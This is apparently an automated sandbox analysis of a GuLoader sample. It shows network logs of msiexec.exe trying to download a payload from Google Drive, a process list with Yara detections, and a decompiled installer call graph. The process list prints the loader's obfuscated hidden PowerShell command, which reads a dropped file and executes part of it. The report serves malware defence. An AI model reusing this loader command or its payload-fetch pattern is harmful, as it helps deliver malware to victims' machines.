                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:51 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: script-src 'nonce-XpujJiISN93o5W_p8A-j_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.949735142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:53 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:54 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:53 GMT
                                                                            Content-Security-Policy: script-src 'nonce-L6Y-BSH-leork-yuznsohg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC5zv0sc2tom8ulZKyxqIXmNLj5ofdZ2C9qHAwERI5s9nUEw0-cdDX1wN1fgk4sMpW5RGiaRolZ8ug
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 37 6b 6f 68 72 31 44 39 78 79 4b 2d 45 5f 57 70 2d 30 69 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T7kohr1D9xyK-E_Wp-0iWA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.949736172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:56 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:57 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:56 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-MVbYlbPNe8diN_8OZL2fww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.949737142.250.181.14434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:44:58 UTC460OUTGET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:44:59 UTC1854INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:44:59 GMT
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-5u_aELJgQcxXQRneYHJ_bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Length: 1652
                                                                            X-GUploader-UploadID: AFiumC6q7JIspnS2vBysMyt0_LXY8EGBdX-GFKFfnZcJ9pam3s21yzbqVHekFt0pKhEJQi6DfKc4i1skiA
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2024-12-03 15:44:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 61 6a 70 48 34 57 66 46 65 75 4c 77 77 43 4e 38 39 68 5a 50 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NajpH4WfFeuLwwCN89hZPQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.949738172.217.19.1744434516C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 15:45:01 UTC418OUTGET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: drive.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
                                                                            2024-12-03 15:45:02 UTC1920INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Tue, 03 Dec 2024 15:45:02 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'nonce-pgdqZdNE_nbs3XKxmau0Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:10:42:57
                                                                            Start date:03/12/2024
                                                                            Path:C:\Users\user\Desktop\AwMu7gR48D.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\AwMu7gR48D.exe"
                                                                            Imagebase:0x400000
                                                                            File size:500'524 bytes
                                                                            MD5 hash:E910DD39A106DFB09F31945608899357
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:43:01
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
                                                                            Imagebase:0xd20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:10:43:01
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:43:38
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                            Imagebase:0x560000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:20.4%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:21.1%
                                                                              Total number of Nodes:1334
                                                                              Total number of Limit Nodes:32
                                                                              execution_graph 3910 4025c4 3919 402a9f 3910->3919 3912 4025ce 3913 405b40 ReadFile 3912->3913 3914 40263e 3912->3914 3916 40264e 3912->3916 3918 40263c 3912->3918 3913->3912 3922 405e8d wsprintfA 3914->3922 3917 402664 SetFilePointer 3916->3917 3916->3918 3917->3918 3920 405f51 17 API calls 3919->3920 3921 402ab4 3920->3921 3921->3912 3922->3918 3930 402245 3931 402ac1 17 API calls 3930->3931 3932 40224b 3931->3932 3933 402ac1 17 API calls 3932->3933 3934 402254 3933->3934 3935 402ac1 17 API calls 3934->3935 3936 40225d 3935->3936 3937 406232 2 API calls 3936->3937 3938 402266 3937->3938 3939 402277 lstrlenA lstrlenA 3938->3939 3940 40226a 3938->3940 3942 405056 24 API calls 3939->3942 3941 405056 24 API calls 3940->3941 3943 402272 3941->3943 3944 4022b3 SHFileOperationA 3942->3944 3944->3940 3944->3943 3945 4028c5 3946 402a9f 17 API calls 3945->3946 3947 4028cb 3946->3947 3948 402900 3947->3948 3949 402716 3947->3949 3951 4028dd 3947->3951 3948->3949 3950 405f51 17 API calls 3948->3950 3950->3949 3951->3949 3953 405e8d wsprintfA 3951->3953 3953->3949 3397 401746 3398 402ac1 17 API calls 3397->3398 3399 40174d 3398->3399 3403 405af7 3399->3403 3401 401754 3402 405af7 2 API calls 3401->3402 3402->3401 3404 405b02 GetTickCount GetTempFileNameA 3403->3404 3405 405b33 3404->3405 3406 405b2f 3404->3406 3405->3401 3406->3404 3406->3405 3954 401947 3955 402ac1 17 API calls 3954->3955 3956 40194e lstrlenA 3955->3956 3957 402577 3956->3957 3958 4022c7 3959 4022ce 3958->3959 3963 4022e1 3958->3963 3960 405f51 17 API calls 3959->3960 3961 4022db 3960->3961 3962 40564b MessageBoxIndirectA 3961->3962 3962->3963 3964 404fca 3965 404fda 3964->3965 3966 404fee 3964->3966 3967 404fe0 3965->3967 3968 405037 3965->3968 3969 404ff6 IsWindowVisible 3966->3969 3975 40500d 3966->3975 3971 40403c SendMessageA 3967->3971 3970 40503c CallWindowProcA 3968->3970 3969->3968 3972 405003 3969->3972 3973 404fea 3970->3973 3971->3973 3977 404921 SendMessageA 3972->3977 3975->3970 3982 4049a1 3975->3982 3978 404980 SendMessageA 3977->3978 3979 404944 GetMessagePos ScreenToClient SendMessageA 3977->3979 3980 404978 3978->3980 3979->3980 3981 40497d 3979->3981 3980->3975 3981->3978 3991 405f2f lstrcpynA 3982->3991 3984 4049b4 3992 405e8d wsprintfA 3984->3992 3986 4049be 3987 40140b 2 API calls 3986->3987 3988 4049c7 3987->3988 3993 405f2f lstrcpynA 3988->3993 3990 4049ce 3990->3968 3991->3984 3992->3986 3993->3990 3997 4020cb 3998 402ac1 17 API calls 3997->3998 3999 4020d2 3998->3999 4000 402ac1 17 API calls 3999->4000 4001 4020dc 4000->4001 4002 402ac1 17 API calls 4001->4002 4003 4020e6 4002->4003 4004 402ac1 17 API calls 4003->4004 4005 4020f0 4004->4005 4006 402ac1 17 API calls 4005->4006 4007 4020fa 4006->4007 4008 40213c CoCreateInstance 4007->4008 4009 402ac1 17 API calls 4007->4009 4012 40215b 4008->4012 4014 402206 4008->4014 4009->4008 4010 401423 24 API calls 4011 40223c 4010->4011 4013 4021e6 MultiByteToWideChar 4012->4013 4012->4014 4013->4014 4014->4010 4014->4011 4015 4026ce 4016 4026d4 4015->4016 4017 4026d8 FindNextFileA 4016->4017 4020 4026ea 4016->4020 4018 402729 4017->4018 4017->4020 4021 405f2f lstrcpynA 4018->4021 4021->4020 4022 4023d0 4023 402ac1 17 API calls 4022->4023 4024 4023e2 4023->4024 4025 402ac1 17 API calls 4024->4025 4026 4023ec 4025->4026 4039 402b51 4026->4039 4029 402716 4030 402421 4031 40242d 4030->4031 4034 402a9f 17 API calls 4030->4034 4035 40244c RegSetValueExA 4031->4035 4036 402f81 35 API calls 4031->4036 4032 402ac1 17 API calls 4033 40241a lstrlenA 4032->4033 4033->4030 4034->4031 4037 402462 RegCloseKey 4035->4037 4036->4035 4037->4029 4040 402b6c 4039->4040 4043 405de3 4040->4043 4044 405df2 4043->4044 4045 4023fc 4044->4045 4046 405dfd RegCreateKeyExA 4044->4046 4045->4029 4045->4030 4045->4032 4046->4045 4047 4049d3 GetDlgItem GetDlgItem 4048 404a25 7 API calls 4047->4048 4054 404c3d 4047->4054 4049 404ac8 DeleteObject 4048->4049 4050 404abb SendMessageA 4048->4050 4051 404ad1 4049->4051 4050->4049 4052 404b08 4051->4052 4053 405f51 17 API calls 4051->4053 4055 403ff0 18 API calls 4052->4055 4058 404aea SendMessageA SendMessageA 4053->4058 4057 404d21 4054->4057 4064 404921 5 API calls 4054->4064 4080 404cae 4054->4080 4061 404b1c 4055->4061 4056 404dcd 4059 404dd7 SendMessageA 4056->4059 4060 404ddf 4056->4060 4057->4056 4066 404d7a SendMessageA 4057->4066 4090 404c30 4057->4090 4058->4051 4059->4060 4068 404df1 ImageList_Destroy 4060->4068 4069 404df8 4060->4069 4077 404e08 4060->4077 4065 403ff0 18 API calls 4061->4065 4062 404057 8 API calls 4067 404fc3 4062->4067 4063 404d13 SendMessageA 4063->4057 4064->4080 4081 404b2a 4065->4081 4071 404d8f SendMessageA 4066->4071 4066->4090 4068->4069 4072 404e01 GlobalFree 4069->4072 4069->4077 4070 404f77 4075 404f89 ShowWindow GetDlgItem ShowWindow 4070->4075 4070->4090 4074 404da2 4071->4074 4072->4077 4073 404bfe GetWindowLongA SetWindowLongA 4076 404c17 4073->4076 4082 404db3 SendMessageA 4074->4082 4075->4090 4078 404c35 4076->4078 4079 404c1d ShowWindow 4076->4079 4077->4070 4089 4049a1 4 API calls 4077->4089 4094 404e43 4077->4094 4099 404025 SendMessageA 4078->4099 4098 404025 SendMessageA 4079->4098 4080->4057 4080->4063 4081->4073 4083 404bf8 4081->4083 4086 404b79 SendMessageA 4081->4086 4087 404bb5 SendMessageA 4081->4087 4088 404bc6 SendMessageA 4081->4088 4082->4056 4083->4073 4083->4076 4086->4081 4087->4081 4088->4081 4089->4094 4090->4062 4091 404f4d InvalidateRect 4091->4070 4092 404f63 4091->4092 4100 4048dc 4092->4100 4093 404e71 SendMessageA 4097 404e87 4093->4097 4094->4093 4094->4097 4096 404efb SendMessageA SendMessageA 4096->4097 4097->4091 4097->4096 4098->4090 4099->4054 4103 404817 4100->4103 4102 4048f1 4102->4070 4104 40482d 4103->4104 4105 405f51 17 API calls 4104->4105 4106 404891 4105->4106 4107 405f51 17 API calls 4106->4107 4108 40489c 4107->4108 4109 405f51 17 API calls 4108->4109 4110 4048b2 lstrlenA wsprintfA SetDlgItemTextA 4109->4110 4110->4102 4111 401cd4 4112 402a9f 17 API calls 4111->4112 4113 401cda IsWindow 4112->4113 4114 401a0e 4113->4114 4115 4014d6 4116 402a9f 17 API calls 4115->4116 4117 4014dc Sleep 4116->4117 4119 402951 4117->4119 3407 401759 3408 402ac1 17 API calls 3407->3408 3409 401760 3408->3409 3410 401786 3409->3410 3411 40177e 3409->3411 3468 405f2f lstrcpynA 3410->3468 3467 405f2f lstrcpynA 3411->3467 3414 401784 3418 406199 5 API calls 3414->3418 3415 401791 3416 4058c7 3 API calls 3415->3416 3417 401797 lstrcatA 3416->3417 3417->3414 3434 4017a3 3418->3434 3419 406232 2 API calls 3419->3434 3420 405aa3 2 API calls 3420->3434 3422 4017ba CompareFileTime 3422->3434 3423 40187e 3425 405056 24 API calls 3423->3425 3424 401855 3426 405056 24 API calls 3424->3426 3435 40186a 3424->3435 3428 401888 3425->3428 3426->3435 3427 405f2f lstrcpynA 3427->3434 3446 402f81 3428->3446 3431 4018af SetFileTime 3432 4018c1 CloseHandle 3431->3432 3432->3435 3436 4018d2 3432->3436 3433 405f51 17 API calls 3433->3434 3434->3419 3434->3420 3434->3422 3434->3423 3434->3424 3434->3427 3434->3433 3445 405ac8 GetFileAttributesA CreateFileA 3434->3445 3469 40564b 3434->3469 3437 4018d7 3436->3437 3438 4018ea 3436->3438 3439 405f51 17 API calls 3437->3439 3440 405f51 17 API calls 3438->3440 3442 4018df lstrcatA 3439->3442 3443 4018f2 3440->3443 3442->3443 3444 40564b MessageBoxIndirectA 3443->3444 3444->3435 3445->3434 3448 402f97 3446->3448 3447 402fc2 3473 40315d 3447->3473 3448->3447 3483 403173 SetFilePointer 3448->3483 3452 4030fd 3454 403101 3452->3454 3459 403119 3452->3459 3453 402fdf GetTickCount 3463 402ff2 3453->3463 3456 40315d ReadFile 3454->3456 3455 40189b 3455->3431 3455->3432 3456->3455 3457 40315d ReadFile 3457->3459 3458 40315d ReadFile 3458->3463 3459->3455 3459->3457 3460 405b6f WriteFile 3459->3460 3460->3459 3462 403058 GetTickCount 3462->3463 3463->3455 3463->3458 3463->3462 3464 403081 MulDiv wsprintfA 